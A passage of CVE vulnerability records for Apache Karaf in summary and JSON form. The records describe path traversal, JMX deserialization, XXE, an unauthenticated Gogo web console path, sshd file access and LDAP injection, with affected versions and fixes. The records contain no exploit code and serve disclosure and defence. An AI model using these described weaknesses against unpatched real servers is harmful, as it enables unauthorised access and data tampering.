              "ASSIGNER": "security@apache.org",
              "ID": "CVE-2022-22932",
              "STATE": "PUBLIC",
              "TITLE": "Path traversal flaws"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "Apache Karaf",
                          "version": {
                            "version_data": [
                              {
                                "version_affected": "\u003c",
                                "version_name": "Apache Karaf",
                                "version_value": "4.2.15"
                              },
                              {
                                "version_affected": "\u003c",
                                "version_name": "Apache Karaf",
                                "version_value": "4.3.6"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "Apache Software Foundation"
                  }
                ]
              }
            },
            "credit": [
              {
                "lang": "eng",
                "value": "This issue was discovered and reported by GHSL team member Jaroslav Lobacevski"
              }
            ],
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "Apache Karaf obr:* commands and run goal on the karaf-maven-plugin have partial path traversal which allows to break out of expected folder. The risk is low as obr:* commands are not very used and the entry is set by user. This has been fixed in revision: https://gitbox.apache.org/repos/asf?p=karaf.git;h=36a2bc4 https://gitbox.apache.org/repos/asf?p=karaf.git;h=52b70cf Mitigation: Apache Karaf users should upgrade to 4.2.15 or 4.3.6 or later as soon as possible, or use correct path. JIRA Tickets: https://issues.apache.org/jira/browse/KARAF-7326"
                }
              ]
            },
            "generator": {
              "engine": "Vulnogram 0.0.9"
            },
            "impact": [
              {
                "other": "The risk is low as obr:* commands are not very used and the entry is set by user."
              }
            ],
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "Path traversal flaws"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "https://karaf.apache.org/security/cve-2022-22932.txt",
                  "refsource": "MISC",
                  "url": "https://karaf.apache.org/security/cve-2022-22932.txt"
                }
              ]
            },
            "source": {
              "discovery": "UNKNOWN"
            },
            "work_around": [
              {
                "lang": "en",
                "value": "Apache Karaf users should upgrade to 4.2.15 or 4.3.6 or later as soon as possible, or use correct path."
              }
            ]
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
        "assignerShortName": "apache",
        "cveId": "CVE-2022-22932",
        "datePublished": "2022-01-26T11:10:12.000Z",
        "dateReserved": "2022-01-10T00:00:00.000Z",
        "dateUpdated": "2024-08-03T03:28:42.479Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2021-41766 (GCVE-0-2021-41766)

    Vulnerability from nvd – Published: 2022-01-26 11:10 – Updated: 2024-08-04 03:15
    VLAI
    Title
    Insecure Java Deserialization in Apache Karaf
    Summary
    Apache Karaf allows monitoring of applications and the Java runtime by using the Java Management Extensions (JMX). JMX is a Java RMI based technology that relies on Java serialized objects for client server communication. Whereas the default JMX implementation is hardened against unauthenticated deserialization attacks, the implementation used by Apache Karaf is not protected against this kind of attack. The impact of Java deserialization vulnerabilities strongly depends on the classes that are available within the targets class path. Generally speaking, deserialization of untrusted data does always represent a high security risk and should be prevented. The risk is low as, by default, Karaf uses a limited set of classes in the JMX server class path. It depends of system scoped classes (e.g. jar in the lib folder).
    Severity
    No CVSS data available.
    CWE
    • Insecure Java Deserialization
    References
    Impacted products
    Vendor Product Version
    Apache Software Foundation Apache Karaf Affected: Apache Karaf , < 4.3.6 (custom)
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-04T03:15:29.312Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "https://karaf.apache.org/security/cve-2021-41766.txt"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "Apache Karaf",
              "vendor": "Apache Software Foundation",
              "versions": [
                {
                  "lessThan": "4.3.6",
                  "status": "affected",
                  "version": "Apache Karaf",
                  "versionType": "custom"
                }
              ]
            }
          ],
          "credits": [
            {
              "lang": "en",
              "value": "This issue was reported by Daniel Heyne, Konstantin Samuel and Tobias Neitzel."
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "value": "Apache Karaf allows monitoring of applications and the Java runtime by using the Java Management Extensions (JMX). JMX is a Java RMI based technology that relies on Java serialized objects for client server communication. Whereas the default JMX implementation is hardened against unauthenticated deserialization attacks, the implementation used by Apache Karaf is not protected against this kind of attack. The impact of Java deserialization vulnerabilities strongly depends on the classes that are available within the targets class path. Generally speaking, deserialization of untrusted data does always represent a high security risk and should be prevented. The risk is low as, by default, Karaf uses a limited set of classes in the JMX server class path. It depends of system scoped classes (e.g. jar in the lib folder)."
            }
          ],
          "metrics": [
            {
              "other": {
                "content": {
                  "other": "The risk is low as, by default, Karaf uses a limited set of classes in the JMX server class path. It depends of system scoped classes (e.g. jar in the lib folder)."
                },
                "type": "unknown"
              }
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "Insecure Java Deserialization",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2022-01-26T11:10:11.000Z",
            "orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
            "shortName": "apache"
          },
          "references": [
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "https://karaf.apache.org/security/cve-2021-41766.txt"
            }
          ],
          "source": {
            "discovery": "UNKNOWN"
          },
          "title": "Insecure Java Deserialization in Apache Karaf",
          "workarounds": [
            {
              "lang": "en",
              "value": "Apache Karaf users should upgrade to 4.3.6 or later as soon as possible, or disable remote access to JMX server."
            }
          ],
          "x_generator": {
            "engine": "Vulnogram 0.0.9"
          },
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "security@apache.org",
              "ID": "CVE-2021-41766",
              "STATE": "PUBLIC",
              "TITLE": "Insecure Java Deserialization in Apache Karaf"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "Apache Karaf",
                          "version": {
                            "version_data": [
                              {
                                "version_affected": "\u003c",
                                "version_name": "Apache Karaf",
                                "version_value": "4.3.6"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "Apache Software Foundation"
                  }
                ]
              }
            },
            "credit": [
              {
                "lang": "eng",
                "value": "This issue was reported by Daniel Heyne, Konstantin Samuel and Tobias Neitzel."
              }
            ],
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "Apache Karaf allows monitoring of applications and the Java runtime by using the Java Management Extensions (JMX). JMX is a Java RMI based technology that relies on Java serialized objects for client server communication. Whereas the default JMX implementation is hardened against unauthenticated deserialization attacks, the implementation used by Apache Karaf is not protected against this kind of attack. The impact of Java deserialization vulnerabilities strongly depends on the classes that are available within the targets class path. Generally speaking, deserialization of untrusted data does always represent a high security risk and should be prevented. The risk is low as, by default, Karaf uses a limited set of classes in the JMX server class path. It depends of system scoped classes (e.g. jar in the lib folder)."
                }
              ]
            },
            "generator": {
              "engine": "Vulnogram 0.0.9"
            },
            "impact": [
              {
                "other": "The risk is low as, by default, Karaf uses a limited set of classes in the JMX server class path. It depends of system scoped classes (e.g. jar in the lib folder)."
              }
            ],
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "Insecure Java Deserialization"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "https://karaf.apache.org/security/cve-2021-41766.txt",
                  "refsource": "MISC",
                  "url": "https://karaf.apache.org/security/cve-2021-41766.txt"
                }
              ]
            },
            "source": {
              "discovery": "UNKNOWN"
            },
            "work_around": [
              {
                "lang": "en",
                "value": "Apache Karaf users should upgrade to 4.3.6 or later as soon as possible, or disable remote access to JMX server."
              }
            ]
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
        "assignerShortName": "apache",
        "cveId": "CVE-2021-41766",
        "datePublished": "2022-01-26T11:10:11.000Z",
        "dateReserved": "2021-09-27T00:00:00.000Z",
        "dateUpdated": "2024-08-04T03:15:29.312Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2018-11788 (GCVE-0-2018-11788)

    Vulnerability from nvd – Published: 2019-01-07 16:00 – Updated: 2024-08-05 08:17
    VLAI
    Summary
    Apache Karaf provides a features deployer, which allows users to "hot deploy" a features XML by dropping the file directly in the deploy folder. The features XML is parsed by XMLInputFactory class. Apache Karaf XMLInputFactory class doesn't contain any mitigation codes against XXE. This is a potential security risk as an user can inject external XML entities in Apache Karaf version prior to 4.1.7 or 4.2.2. It has been fixed in Apache Karaf 4.1.7 and 4.2.2 releases.
    Severity
    No CVSS data available.
    CWE
    • XXE vulnerability
    References
    Impacted products
    Vendor Product Version
    Apache Software Foundation Apache Karaf Affected: Any Apache Karaf version prior to 4.1.7 and 4.2.2
    Create a notification for this product.
    Date Public
    2019-01-07 00:00
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-05T08:17:09.240Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "http://karaf.apache.org/security/cve-2018-11788.txt"
              },
              {
                "name": "106479",
                "tags": [
                  "vdb-entry",
                  "x_refsource_BID",
                  "x_transferred"
                ],
                "url": "http://www.securityfocus.com/bid/106479"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "Apache Karaf",
              "vendor": "Apache Software Foundation",
              "versions": [
                {
                  "status": "affected",
                  "version": "Any Apache Karaf version prior to 4.1.7 and 4.2.2"
                }
              ]
            }
          ],
          "datePublic": "2019-01-07T00:00:00.000Z",
          "descriptions": [
            {
              "lang": "en",
              "value": "Apache Karaf provides a features deployer, which allows users to \"hot deploy\" a features XML by dropping the file directly in the deploy folder. The features XML is parsed by XMLInputFactory class. Apache Karaf XMLInputFactory class doesn\u0027t contain any mitigation codes against XXE. This is a potential security risk as an user can inject external XML entities in Apache Karaf version prior to 4.1.7 or 4.2.2. It has been fixed in Apache Karaf 4.1.7 and 4.2.2 releases."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "XXE vulnerability",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2019-01-09T10:57:01.000Z",
            "orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
            "shortName": "apache"
          },
          "references": [
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "http://karaf.apache.org/security/cve-2018-11788.txt"
            },
            {
              "name": "106479",
              "tags": [
                "vdb-entry",
                "x_refsource_BID"
              ],
              "url": "http://www.securityfocus.com/bid/106479"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "security@apache.org",
              "ID": "CVE-2018-11788",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "Apache Karaf",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "Any Apache Karaf version prior to 4.1.7 and 4.2.2"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "Apache Software Foundation"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "Apache Karaf provides a features deployer, which allows users to \"hot deploy\" a features XML by dropping the file directly in the deploy folder. The features XML is parsed by XMLInputFactory class. Apache Karaf XMLInputFactory class doesn\u0027t contain any mitigation codes against XXE. This is a potential security risk as an user can inject external XML entities in Apache Karaf version prior to 4.1.7 or 4.2.2. It has been fixed in Apache Karaf 4.1.7 and 4.2.2 releases."
                }
              ]
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "XXE vulnerability"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "http://karaf.apache.org/security/cve-2018-11788.txt",
                  "refsource": "MISC",
                  "url": "http://karaf.apache.org/security/cve-2018-11788.txt"
                },
                {
                  "name": "106479",
                  "refsource": "BID",
                  "url": "http://www.securityfocus.com/bid/106479"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
        "assignerShortName": "apache",
        "cveId": "CVE-2018-11788",
        "datePublished": "2019-01-07T16:00:00.000Z",
        "dateReserved": "2018-06-05T00:00:00.000Z",
        "dateUpdated": "2024-08-05T08:17:09.240Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2018-11787 (GCVE-0-2018-11787)

    Vulnerability from nvd – Published: 2018-09-18 14:00 – Updated: 2024-09-17 02:16
    VLAI
    Summary
    In Apache Karaf version prior to 3.0.9, 4.0.9, 4.1.1, when the webconsole feature is installed in Karaf, it is available at .../system/console and requires authentication to access it. One part of the console is a Gogo shell/console that gives access to the command line console of Karaf via a Web browser, and when navigated to it is available at .../system/console/gogo. Trying to go directly to that URL does require authentication. And optional bundle that some applications use is the Pax Web Extender Whiteboard, it is part of the pax-war feature and perhaps others. When it is installed, the Gogo console becomes available at another URL .../gogo/, and that URL is not secured giving access to the Karaf console to unauthenticated users. A mitigation for the issue is to manually stop/uninstall Gogo plugin bundle that is installed with the webconsole feature, although of course this removes the console from the .../system/console application, not only from the unauthenticated endpoint. One could also stop/uninstall the Pax Web Extender Whiteboard, but other components/applications may require it and so their functionality would be reduced/compromised.
    Severity
    No CVSS data available.
    CWE
    • Unsecure Access
    References
    Impacted products
    Vendor Product Version
    Apache Software Foundation Apache Karaf Affected: prior to 3.0.9
    Affected: 4.0.x prior to 4.0.9
    Affected: 4.1.x prior to 4.1.1
    Create a notification for this product.
    Date Public
    2018-09-18 00:00
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-05T08:17:09.210Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_refsource_CONFIRM",
                  "x_transferred"
                ],
                "url": "https://issues.apache.org/jira/browse/KARAF-4993"
              },
              {
                "name": "[karaf-dev] 20180918 [SECURITY] New security advisory for CVE-2018-11787 released for Apache Karaf",
                "tags": [
                  "mailing-list",
                  "x_refsource_MLIST",
                  "x_transferred"
                ],
                "url": "https://lists.apache.org/thread.html/d9ba4c3104ba32225646879a057b75b54430f349c246c85469037d3c%40%3Cdev.karaf.apache.org%3E"
              },
              {
                "tags": [
                  "x_refsource_CONFIRM",
                  "x_transferred"
                ],
                "url": "http://karaf.apache.org/security/cve-2018-11787.txt"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "Apache Karaf",
              "vendor": "Apache Software Foundation",
              "versions": [
                {
                  "status": "affected",
                  "version": "prior to 3.0.9"
                },
                {
                  "status": "affected",
                  "version": "4.0.x prior to 4.0.9"
                },
                {
                  "status": "affected",
                  "version": "4.1.x prior to 4.1.1"
                }
              ]
            }
          ],
          "datePublic": "2018-09-18T00:00:00.000Z",
          "descriptions": [
            {
              "lang": "en",
              "value": "In Apache Karaf version prior to 3.0.9, 4.0.9, 4.1.1, when the webconsole feature is installed in Karaf, it is available at .../system/console and requires authentication to access it. One part of the console is a Gogo shell/console that gives access to the command line console of Karaf via a Web browser, and when navigated to it is available at .../system/console/gogo. Trying to go directly to that URL does require authentication. And optional bundle that some applications use is the Pax Web Extender Whiteboard, it is part of the pax-war feature and perhaps others. When it is installed, the Gogo console becomes available at another URL .../gogo/, and that URL is not secured giving access to the Karaf console to unauthenticated users. A mitigation for the issue is to manually stop/uninstall Gogo plugin bundle that is installed with the webconsole feature, although of course this removes the console from the .../system/console application, not only from the unauthenticated endpoint. One could also stop/uninstall the Pax Web Extender Whiteboard, but other components/applications may require it and so their functionality would be reduced/compromised."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "Unsecure Access",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2018-09-18T13:57:02.000Z",
            "orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
            "shortName": "apache"
          },
          "references": [
            {
              "tags": [
                "x_refsource_CONFIRM"
              ],
              "url": "https://issues.apache.org/jira/browse/KARAF-4993"
            },
            {
              "name": "[karaf-dev] 20180918 [SECURITY] New security advisory for CVE-2018-11787 released for Apache Karaf",
              "tags": [
                "mailing-list",
                "x_refsource_MLIST"
              ],
              "url": "https://lists.apache.org/thread.html/d9ba4c3104ba32225646879a057b75b54430f349c246c85469037d3c%40%3Cdev.karaf.apache.org%3E"
            },
            {
              "tags": [
                "x_refsource_CONFIRM"
              ],
              "url": "http://karaf.apache.org/security/cve-2018-11787.txt"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "security@apache.org",
              "DATE_PUBLIC": "2018-09-18T00:00:00",
              "ID": "CVE-2018-11787",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "Apache Karaf",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "prior to 3.0.9"
                              },
                              {
                                "version_value": "4.0.x prior to 4.0.9"
                              },
                              {
                                "version_value": "4.1.x prior to 4.1.1"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "Apache Software Foundation"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "In Apache Karaf version prior to 3.0.9, 4.0.9, 4.1.1, when the webconsole feature is installed in Karaf, it is available at .../system/console and requires authentication to access it. One part of the console is a Gogo shell/console that gives access to the command line console of Karaf via a Web browser, and when navigated to it is available at .../system/console/gogo. Trying to go directly to that URL does require authentication. And optional bundle that some applications use is the Pax Web Extender Whiteboard, it is part of the pax-war feature and perhaps others. When it is installed, the Gogo console becomes available at another URL .../gogo/, and that URL is not secured giving access to the Karaf console to unauthenticated users. A mitigation for the issue is to manually stop/uninstall Gogo plugin bundle that is installed with the webconsole feature, although of course this removes the console from the .../system/console application, not only from the unauthenticated endpoint. One could also stop/uninstall the Pax Web Extender Whiteboard, but other components/applications may require it and so their functionality would be reduced/compromised."
                }
              ]
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "Unsecure Access"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "https://issues.apache.org/jira/browse/KARAF-4993",
                  "refsource": "CONFIRM",
                  "url": "https://issues.apache.org/jira/browse/KARAF-4993"
                },
                {
                  "name": "[karaf-dev] 20180918 [SECURITY] New security advisory for CVE-2018-11787 released for Apache Karaf",
                  "refsource": "MLIST",
                  "url": "https://lists.apache.org/thread.html/d9ba4c3104ba32225646879a057b75b54430f349c246c85469037d3c@%3Cdev.karaf.apache.org%3E"
                },
                {
                  "name": "http://karaf.apache.org/security/cve-2018-11787.txt",
                  "refsource": "CONFIRM",
                  "url": "http://karaf.apache.org/security/cve-2018-11787.txt"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
        "assignerShortName": "apache",
        "cveId": "CVE-2018-11787",
        "datePublished": "2018-09-18T14:00:00.000Z",
        "dateReserved": "2018-06-05T00:00:00.000Z",
        "dateUpdated": "2024-09-17T02:16:58.807Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2018-11786 (GCVE-0-2018-11786)

    Vulnerability from nvd – Published: 2018-09-18 14:00 – Updated: 2024-09-17 02:12
    VLAI
    Summary
    In Apache Karaf prior to 4.2.0 release, if the sshd service in Karaf is left on so an administrator can manage the running instance, any user with rights to the Karaf console can pivot and read/write any file on the file system to which the Karaf process user has access. This can be locked down a bit by using chroot to change the root directory to protect files outside of the Karaf install directory; it can be further locked down by defining a security manager policy that limits file system access to those directories beneath the Karaf home that are necessary for the system to run. However, this still allows anyone with ssh access to the Karaf process to read and write a large number of files as the Karaf process user.
    Severity
    No CVSS data available.
    CWE
    • Process Execution
    References
    Impacted products
    Vendor Product Version
    Apache Software Foundation Apache Karaf Affected: prior to 4.2.0 release
    Create a notification for this product.
    Date Public
    2018-09-18 00:00
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-05T08:17:09.221Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "name": "[karaf-dev] 20180918 [SECURITY] New security advisory for CVE-2018-11786 released for Apache Karaf",
                "tags": [
                  "mailing-list",
                  "x_refsource_MLIST",
                  "x_transferred"
                ],
                "url": "https://lists.apache.org/thread.html/5b7ac762c6bbe77ac5d9389f093fc6dbf196c36d788e3d7629e6c1d9%40%3Cdev.karaf.apache.org%3E"
              },
              {
                "tags": [
                  "x_refsource_CONFIRM",
                  "x_transferred"
                ],
                "url": "https://issues.apache.org/jira/browse/KARAF-5427"
              },
              {
                "tags": [
                  "x_refsource_CONFIRM",
                  "x_transferred"
                ],
                "url": "http://karaf.apache.org/security/cve-2018-11786.txt"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "Apache Karaf",
              "vendor": "Apache Software Foundation",
              "versions": [
                {
                  "status": "affected",
                  "version": "prior to 4.2.0 release"
                }
              ]
            }
          ],
          "datePublic": "2018-09-18T00:00:00.000Z",
          "descriptions": [
            {
              "lang": "en",
              "value": "In Apache Karaf prior to 4.2.0 release, if the sshd service in Karaf is left on so an administrator can manage the running instance, any user with rights to the Karaf console can pivot and read/write any file on the file system to which the Karaf process user has access. This can be locked down a bit by using chroot to change the root directory to protect files outside of the Karaf install directory; it can be further locked down by defining a security manager policy that limits file system access to those directories beneath the Karaf home that are necessary for the system to run. However, this still allows anyone with ssh access to the Karaf process to read and write a large number of files as the Karaf process user."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "Process Execution",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2018-09-18T13:57:02.000Z",
            "orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
            "shortName": "apache"
          },
          "references": [
            {
              "name": "[karaf-dev] 20180918 [SECURITY] New security advisory for CVE-2018-11786 released for Apache Karaf",
              "tags": [
                "mailing-list",
                "x_refsource_MLIST"
              ],
              "url": "https://lists.apache.org/thread.html/5b7ac762c6bbe77ac5d9389f093fc6dbf196c36d788e3d7629e6c1d9%40%3Cdev.karaf.apache.org%3E"
            },
            {
              "tags": [
                "x_refsource_CONFIRM"
              ],
              "url": "https://issues.apache.org/jira/browse/KARAF-5427"
            },
            {
              "tags": [
                "x_refsource_CONFIRM"
              ],
              "url": "http://karaf.apache.org/security/cve-2018-11786.txt"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "security@apache.org",
              "DATE_PUBLIC": "2018-09-18T00:00:00",
              "ID": "CVE-2018-11786",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "Apache Karaf",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "prior to 4.2.0 release"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "Apache Software Foundation"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "In Apache Karaf prior to 4.2.0 release, if the sshd service in Karaf is left on so an administrator can manage the running instance, any user with rights to the Karaf console can pivot and read/write any file on the file system to which the Karaf process user has access. This can be locked down a bit by using chroot to change the root directory to protect files outside of the Karaf install directory; it can be further locked down by defining a security manager policy that limits file system access to those directories beneath the Karaf home that are necessary for the system to run. However, this still allows anyone with ssh access to the Karaf process to read and write a large number of files as the Karaf process user."
                }
              ]
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "Process Execution"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "[karaf-dev] 20180918 [SECURITY] New security advisory for CVE-2018-11786 released for Apache Karaf",
                  "refsource": "MLIST",
                  "url": "https://lists.apache.org/thread.html/5b7ac762c6bbe77ac5d9389f093fc6dbf196c36d788e3d7629e6c1d9@%3Cdev.karaf.apache.org%3E"
                },
                {
                  "name": "https://issues.apache.org/jira/browse/KARAF-5427",
                  "refsource": "CONFIRM",
                  "url": "https://issues.apache.org/jira/browse/KARAF-5427"
                },
                {
                  "name": "http://karaf.apache.org/security/cve-2018-11786.txt",
                  "refsource": "CONFIRM",
                  "url": "http://karaf.apache.org/security/cve-2018-11786.txt"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
        "assignerShortName": "apache",
        "cveId": "CVE-2018-11786",
        "datePublished": "2018-09-18T14:00:00.000Z",
        "dateReserved": "2018-06-05T00:00:00.000Z",
        "dateUpdated": "2024-09-17T02:12:17.084Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2016-8750 (GCVE-0-2016-8750)

    Vulnerability from nvd – Published: 2018-02-19 15:00 – Updated: 2024-09-17 00:36
    VLAI
    Summary
    Apache Karaf prior to 4.0.8 used the LDAPLoginModule to authenticate users to a directory via LDAP. However, it did not encoding usernames properly and hence was vulnerable to LDAP injection attacks leading to a denial of service.
    Severity
    No CVSS data available.
    CWE
    • Injection Attack
    References
    URL Tags
    https://access.redhat.com/errata/RHSA-2018:1322 vendor-advisoryx_refsource_REDHAT
    https://karaf.apache.org/security/cve-2016-8750.txt x_refsource_CONFIRM
    http://www.securityfocus.com/bid/103098 vdb-entryx_refsource_BID
    Impacted products
    Date Public
    2017-12-04 00:00
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-06T02:35:00.163Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "name": "RHSA-2018:1322",
                "tags": [
                  "vendor-advisory",
                  "x_refsource_REDHAT",
                  "x_transferred"
                ],
                "url": "https://access.redhat.com/errata/RHSA-2018:1322"
              },
              {
                "tags": [
                  "x_refsource_CONFIRM",
                  "x_transferred"
                ],
                "url": "https://karaf.apache.org/security/cve-2016-8750.txt"
              },
              {
                "name": "103098",
                "tags": [
                  "vdb-entry",
                  "x_refsource_BID",
                  "x_transferred"
                ],
                "url": "http://www.securityfocus.com/bid/103098"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "Apache Karaf",
              "vendor": "Apache Software Foundation",
              "versions": [
                {
                  "status": "affected",
                  "version": "prior to 4.0.8"
                }
              ]
            }
          ],
          "datePublic": "2017-12-04T00:00:00.000Z",
          "descriptions": [
            {
              "lang": "en",
              "value": "Apache Karaf prior to 4.0.8 used the LDAPLoginModule to authenticate users to a directory via LDAP. However, it did not encoding usernames properly and hence was vulnerable to LDAP injection attacks leading to a denial of service."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "Injection Attack",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2018-05-04T09:57:01.000Z",
            "orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
            "shortName": "apache"
          },
          "references": [
            {
              "name": "RHSA-2018:1322",
              "tags": [
                "vendor-advisory",
                "x_refsource_REDHAT"
              ],
              "url": "https://access.redhat.com/errata/RHSA-2018:1322"
            },
            {
              "tags": [
                "x_refsource_CONFIRM"
              ],
              "url": "https://karaf.apache.org/security/cve-2016-8750.txt"
            },
            {
              "name": "103098",
              "tags": [
                "vdb-entry",
                "x_refsource_BID"
              ],
              "url": "http://www.securityfocus.com/bid/103098"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "security@apache.org",
              "DATE_PUBLIC": "2017-12-04T00:00:00",
              "ID": "CVE-2016-8750",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "Apache Karaf",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "prior to 4.0.8"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "Apache Software Foundation"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "Apache Karaf prior to 4.0.8 used the LDAPLoginModule to authenticate users to a directory via LDAP. However, it did not encoding usernames properly and hence was vulnerable to LDAP injection attacks leading to a denial of service."
                }
              ]
            },
            "problemtype": {
              "problemtype_data": [
                {
